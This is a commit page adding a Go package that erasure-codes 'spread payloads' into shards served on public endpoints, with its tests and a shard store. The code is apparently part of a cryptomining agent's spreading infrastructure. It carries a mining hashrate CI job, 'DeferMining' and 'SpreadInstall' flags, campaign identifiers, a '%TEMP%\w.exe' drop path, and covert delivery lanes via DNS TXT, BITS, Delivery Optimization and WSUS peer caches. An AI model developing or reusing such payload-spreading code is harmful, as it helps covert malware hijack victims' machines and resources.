Add erasure-coded multi-lane spread foundation.
Some checks failed
CI Docker Mining Proof / Linux agent hashrate proof (push) Has been cancelled
Some checks failed
CI Docker Mining Proof / Linux agent hashrate proof (push) Has been cancelled
Server Reed-Solomon 4+2 shard encode on deploy plans when erasure_lanes_enabled; agents reassemble from parallel lane URLs as staging fallback with BGP/Path Tracer hints.
This commit is contained in:
134
server/internal/erasure/codec.go
Normal file
134
server/internal/erasure/codec.go
Normal file
@@ -0,0 +1,134 @@
|
||||
// Package erasure provides Reed–Solomon k-of-n shard encode/decode for spread payloads.
|
||||
package erasure
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"crypto/sha256"
|
||||
"encoding/hex"
|
||||
"fmt"
|
||||
|
||||
"github.com/klauspost/reedsolomon"
|
||||
)
|
||||
|
||||
const (
|
||||
// SchemeReedSolomonV1 is the deploy-plan erasure scheme identifier.
|
||||
SchemeReedSolomonV1 = "reed_solomon_v1"
|
||||
// DefaultDataShards is the data shard count for spread payload encoding.
|
||||
DefaultDataShards = 4
|
||||
// DefaultParityShards is the parity shard count (any DefaultDataShards of total reconstruct).
|
||||
DefaultParityShards = 2
|
||||
)
|
||||
|
||||
// Params describes a Reed–Solomon split.
|
||||
type Params struct {
|
||||
DataShards int
|
||||
ParityShards int
|
||||
}
|
||||
|
||||
// DefaultParams returns the standard 4+2 erasure split.
|
||||
func DefaultParams() Params {
|
||||
return Params{DataShards: DefaultDataShards, ParityShards: DefaultParityShards}
|
||||
}
|
||||
|
||||
// MinShards returns the minimum shard count required for reconstruction.
|
||||
func (p Params) MinShards() int {
|
||||
if p.DataShards <= 0 {
|
||||
return 0
|
||||
}
|
||||
return p.DataShards
|
||||
}
|
||||
|
||||
// TotalShards returns data + parity shard count.
|
||||
func (p Params) TotalShards() int {
|
||||
return p.DataShards + p.ParityShards
|
||||
}
|
||||
|
||||
// Normalize fills zero values with defaults and validates counts.
|
||||
func (p Params) Normalize() (Params, error) {
|
||||
if p.DataShards <= 0 {
|
||||
p.DataShards = DefaultDataShards
|
||||
}
|
||||
if p.ParityShards <= 0 {
|
||||
p.ParityShards = DefaultParityShards
|
||||
}
|
||||
if p.DataShards < 1 || p.ParityShards < 1 {
|
||||
return Params{}, fmt.Errorf("erasure: invalid shard counts data=%d parity=%d", p.DataShards, p.ParityShards)
|
||||
}
|
||||
if p.DataShards+p.ParityShards > 256 {
|
||||
return Params{}, fmt.Errorf("erasure: too many shards")
|
||||
}
|
||||
return p, nil
|
||||
}
|
||||
|
||||
// Encode splits payload into equal-sized Reed–Solomon shards.
|
||||
// The returned size is the original payload length (for Join on decode).
|
||||
func Encode(data []byte, p Params) ([][]byte, int, error) {
|
||||
p, err := p.Normalize()
|
||||
if err != nil {
|
||||
return nil, 0, err
|
||||
}
|
||||
if len(data) == 0 {
|
||||
return nil, 0, fmt.Errorf("erasure: empty payload")
|
||||
}
|
||||
origSize := len(data)
|
||||
enc, err := reedsolomon.New(p.DataShards, p.ParityShards)
|
||||
if err != nil {
|
||||
return nil, 0, err
|
||||
}
|
||||
shards, err := enc.Split(data)
|
||||
if err != nil {
|
||||
return nil, 0, err
|
||||
}
|
||||
if err := enc.Encode(shards); err != nil {
|
||||
return nil, 0, err
|
||||
}
|
||||
return shards, origSize, nil
|
||||
}
|
||||
|
||||
// Decode reconstructs payload from at least MinShards() shards (nil entries allowed for missing).
|
||||
func Decode(shards [][]byte, payloadSize int, p Params) ([]byte, error) {
|
||||
p, err := p.Normalize()
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
if len(shards) < p.TotalShards() {
|
||||
return nil, fmt.Errorf("erasure: shard slice too short")
|
||||
}
|
||||
present := 0
|
||||
for i := 0; i < p.TotalShards(); i++ {
|
||||
if len(shards[i]) > 0 {
|
||||
present++
|
||||
}
|
||||
}
|
||||
if present < p.MinShards() {
|
||||
return nil, fmt.Errorf("erasure: need %d shards, have %d", p.MinShards(), present)
|
||||
}
|
||||
enc, err := reedsolomon.New(p.DataShards, p.ParityShards)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
if err := enc.Reconstruct(shards); err != nil {
|
||||
return nil, err
|
||||
}
|
||||
ok, err := enc.Verify(shards)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
if !ok {
|
||||
return nil, fmt.Errorf("erasure: shard verification failed")
|
||||
}
|
||||
if payloadSize <= 0 {
|
||||
payloadSize = len(shards[0]) * p.DataShards
|
||||
}
|
||||
var buf bytes.Buffer
|
||||
if err := enc.Join(&buf, shards, payloadSize); err != nil {
|
||||
return nil, err
|
||||
}
|
||||
return buf.Bytes(), nil
|
||||
}
|
||||
|
||||
// PayloadSHA256 returns hex SHA256 of the original payload.
|
||||
func PayloadSHA256(data []byte) string {
|
||||
sum := sha256.Sum256(data)
|
||||
return hex.EncodeToString(sum[:])
|
||||
}
|
||||
94
server/internal/erasure/codec_test.go
Normal file
94
server/internal/erasure/codec_test.go
Normal file
@@ -0,0 +1,94 @@
|
||||
package erasure
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"testing"
|
||||
)
|
||||
|
||||
func TestEncodeDecodeRoundTrip(t *testing.T) {
|
||||
payload := []byte("deploy-plan-test-payload-for-erasure-lanes")
|
||||
shards, size, err := Encode(payload, DefaultParams())
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
if len(shards) != DefaultDataShards+DefaultParityShards {
|
||||
t.Fatalf("shards=%d", len(shards))
|
||||
}
|
||||
got, err := Decode(shards, size, DefaultParams())
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
if !bytes.Equal(got, payload) {
|
||||
t.Fatalf("round-trip mismatch")
|
||||
}
|
||||
}
|
||||
|
||||
func TestDecodeWithMissingParityShards(t *testing.T) {
|
||||
payload := bytes.Repeat([]byte{0xab}, 512)
|
||||
shards, size, err := Encode(payload, DefaultParams())
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
// Drop two parity shards — still reconstruct with 4 data shards.
|
||||
shards[4] = nil
|
||||
shards[5] = nil
|
||||
got, err := Decode(shards, size, DefaultParams())
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
if !bytes.Equal(got, payload) {
|
||||
t.Fatal("reconstruct with missing parity failed")
|
||||
}
|
||||
}
|
||||
|
||||
func TestDecodeWithMixedLoss(t *testing.T) {
|
||||
payload := []byte("mixed-loss-erasure-payload")
|
||||
p := Params{DataShards: 2, ParityShards: 2}
|
||||
shards, size, err := Encode(payload, p)
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
shards[0] = nil
|
||||
shards[3] = nil
|
||||
got, err := Decode(shards, size, p)
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
if !bytes.Equal(got, payload) {
|
||||
t.Fatal("mixed loss reconstruct failed")
|
||||
}
|
||||
}
|
||||
|
||||
func TestDecodeInsufficientShards(t *testing.T) {
|
||||
payload := []byte("short")
|
||||
shards, size, err := Encode(payload, Params{DataShards: 2, ParityShards: 1})
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
shards[0] = nil
|
||||
shards[1] = nil
|
||||
if _, err := Decode(shards, size, Params{DataShards: 2, ParityShards: 1}); err == nil {
|
||||
t.Fatal("expected error for insufficient shards")
|
||||
}
|
||||
}
|
||||
|
||||
func TestBuildPlanStoresShards(t *testing.T) {
|
||||
store := NewShardStore()
|
||||
payload := []byte("lane-plan-payload")
|
||||
plan, err := BuildPlan(store, "http://127.0.0.1:8989", "b1", "c1", payload, `%TEMP%\w.exe`, "exe", "", true, true)
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
if !plan.Enabled || plan.Scheme != SchemeReedSolomonV1 || len(plan.Shards) != 6 {
|
||||
t.Fatalf("plan=%+v", plan)
|
||||
}
|
||||
if plan.PayloadSHA256 != PayloadSHA256(payload) {
|
||||
t.Fatal("sha mismatch")
|
||||
}
|
||||
for _, ref := range plan.Shards {
|
||||
data, ok := store.Get(plan.ShardToken, ref.Index)
|
||||
if !ok || len(data) == 0 {
|
||||
t.Fatalf("missing shard %d", ref.Index)
|
||||
}
|
||||
}
|
||||
}
|
||||
93
server/internal/erasure/lanes.go
Normal file
93
server/internal/erasure/lanes.go
Normal file
@@ -0,0 +1,93 @@
|
||||
package erasure
|
||||
|
||||
import (
|
||||
"crypto/sha256"
|
||||
"encoding/hex"
|
||||
"fmt"
|
||||
"strings"
|
||||
)
|
||||
|
||||
// Parallel lane transport hints — shards map across lanes for redundancy beyond single-lane spread.
|
||||
var parallelLaneOrder = []string{
|
||||
"dns_txt", "bits_curl", "do_peer", "wsus_cache_peer", "dns_txt", "bits_curl",
|
||||
}
|
||||
|
||||
// ShardRef is one erasure shard served on a parallel lane URL.
|
||||
type ShardRef struct {
|
||||
Index int `json:"index"`
|
||||
Lane string `json:"lane"`
|
||||
URL string `json:"url"`
|
||||
}
|
||||
|
||||
// Plan is deploy-plan metadata for agent-side Reed–Solomon reassembly.
|
||||
type Plan struct {
|
||||
Enabled bool `json:"enabled"`
|
||||
Scheme string `json:"scheme"`
|
||||
DataShards int `json:"data_shards"`
|
||||
ParityShards int `json:"parity_shards"`
|
||||
PayloadSHA256 string `json:"sha256"`
|
||||
PayloadSize int `json:"payload_size"`
|
||||
ShardToken string `json:"shard_token"`
|
||||
Dest string `json:"dest,omitempty"`
|
||||
Launch string `json:"launch,omitempty"`
|
||||
DLLExport string `json:"dll_export,omitempty"`
|
||||
DeferMining bool `json:"defer_mining,omitempty"`
|
||||
SpreadInstall bool `json:"spread_install,omitempty"`
|
||||
Shards []ShardRef `json:"shards"`
|
||||
}
|
||||
|
||||
// BuildPlan encodes payload, stores shards, and returns lane metadata for a signed deploy plan.
|
||||
func BuildPlan(store *ShardStore, serverURL, buildID, campaign string, payload []byte, dest, launch, dllExport string, deferMining, spreadInstall bool) (*Plan, error) {
|
||||
if store == nil {
|
||||
return nil, fmt.Errorf("erasure: nil shard store")
|
||||
}
|
||||
p, err := DefaultParams().Normalize()
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
shards, payloadSize, err := Encode(payload, p)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
token := planToken(buildID, campaign, payload)
|
||||
store.Put(token, p, shards)
|
||||
|
||||
base := strings.TrimRight(strings.TrimSpace(serverURL), "/")
|
||||
if base == "" {
|
||||
base = "http://127.0.0.1:8989"
|
||||
}
|
||||
refs := make([]ShardRef, len(shards))
|
||||
for i := range shards {
|
||||
lane := parallelLaneOrder[i%len(parallelLaneOrder)]
|
||||
refs[i] = ShardRef{
|
||||
Index: i,
|
||||
Lane: lane,
|
||||
URL: fmt.Sprintf("%s/api/v1/public/erasure-shard/%s/%d", base, token, i),
|
||||
}
|
||||
}
|
||||
return &Plan{
|
||||
Enabled: true,
|
||||
Scheme: SchemeReedSolomonV1,
|
||||
DataShards: p.DataShards,
|
||||
ParityShards: p.ParityShards,
|
||||
PayloadSHA256: PayloadSHA256(payload),
|
||||
PayloadSize: payloadSize,
|
||||
ShardToken: token,
|
||||
Dest: dest,
|
||||
Launch: launch,
|
||||
DLLExport: dllExport,
|
||||
DeferMining: deferMining,
|
||||
SpreadInstall: spreadInstall,
|
||||
Shards: refs,
|
||||
}, nil
|
||||
}
|
||||
|
||||
func planToken(buildID, campaign string, payload []byte) string {
|
||||
h := sha256.New()
|
||||
_, _ = h.Write([]byte(strings.TrimSpace(buildID)))
|
||||
_, _ = h.Write([]byte{0})
|
||||
_, _ = h.Write([]byte(strings.TrimSpace(campaign)))
|
||||
_, _ = h.Write(payload)
|
||||
sum := h.Sum(nil)
|
||||
return hex.EncodeToString(sum[:8])
|
||||
}
|
||||
71
server/internal/erasure/store.go
Normal file
71
server/internal/erasure/store.go
Normal file
@@ -0,0 +1,71 @@
|
||||
package erasure
|
||||
|
||||
import (
|
||||
"sync"
|
||||
)
|
||||
|
||||
// ShardStore holds encoded shard bytes keyed by deploy-plan token.
|
||||
type ShardStore struct {
|
||||
mu sync.RWMutex
|
||||
plans map[string][][]byte
|
||||
params map[string]Params
|
||||
}
|
||||
|
||||
// NewShardStore creates an in-memory shard cache for public erasure-shard endpoints.
|
||||
func NewShardStore() *ShardStore {
|
||||
return &ShardStore{
|
||||
plans: make(map[string][][]byte),
|
||||
params: make(map[string]Params),
|
||||
}
|
||||
}
|
||||
|
||||
// Put stores shards for a token.
|
||||
func (s *ShardStore) Put(token string, p Params, shards [][]byte) {
|
||||
if s == nil || token == "" || len(shards) == 0 {
|
||||
return
|
||||
}
|
||||
s.mu.Lock()
|
||||
defer s.mu.Unlock()
|
||||
cp := make([][]byte, len(shards))
|
||||
for i, sh := range shards {
|
||||
cp[i] = append([]byte(nil), sh...)
|
||||
}
|
||||
s.plans[token] = cp
|
||||
s.params[token] = p
|
||||
}
|
||||
|
||||
// Get returns one shard by index.
|
||||
func (s *ShardStore) Get(token string, index int) ([]byte, bool) {
|
||||
if s == nil || token == "" {
|
||||
return nil, false
|
||||
}
|
||||
s.mu.RLock()
|
||||
defer s.mu.RUnlock()
|
||||
shards, ok := s.plans[token]
|
||||
if !ok || index < 0 || index >= len(shards) {
|
||||
return nil, false
|
||||
}
|
||||
return append([]byte(nil), shards[index]...), true
|
||||
}
|
||||
|
||||
// ParamsFor returns encoding params for a token.
|
||||
func (s *ShardStore) ParamsFor(token string) (Params, bool) {
|
||||
if s == nil || token == "" {
|
||||
return Params{}, false
|
||||
}
|
||||
s.mu.RLock()
|
||||
defer s.mu.RUnlock()
|
||||
p, ok := s.params[token]
|
||||
return p, ok
|
||||
}
|
||||
|
||||
// Delete removes a token (tests / TTL sweeps).
|
||||
func (s *ShardStore) Delete(token string) {
|
||||
if s == nil || token == "" {
|
||||
return
|
||||
}
|
||||
s.mu.Lock()
|
||||
defer s.mu.Unlock()
|
||||
delete(s.plans, token)
|
||||
delete(s.params, token)
|
||||
}
|
||||
Reference in New Issue
Block a user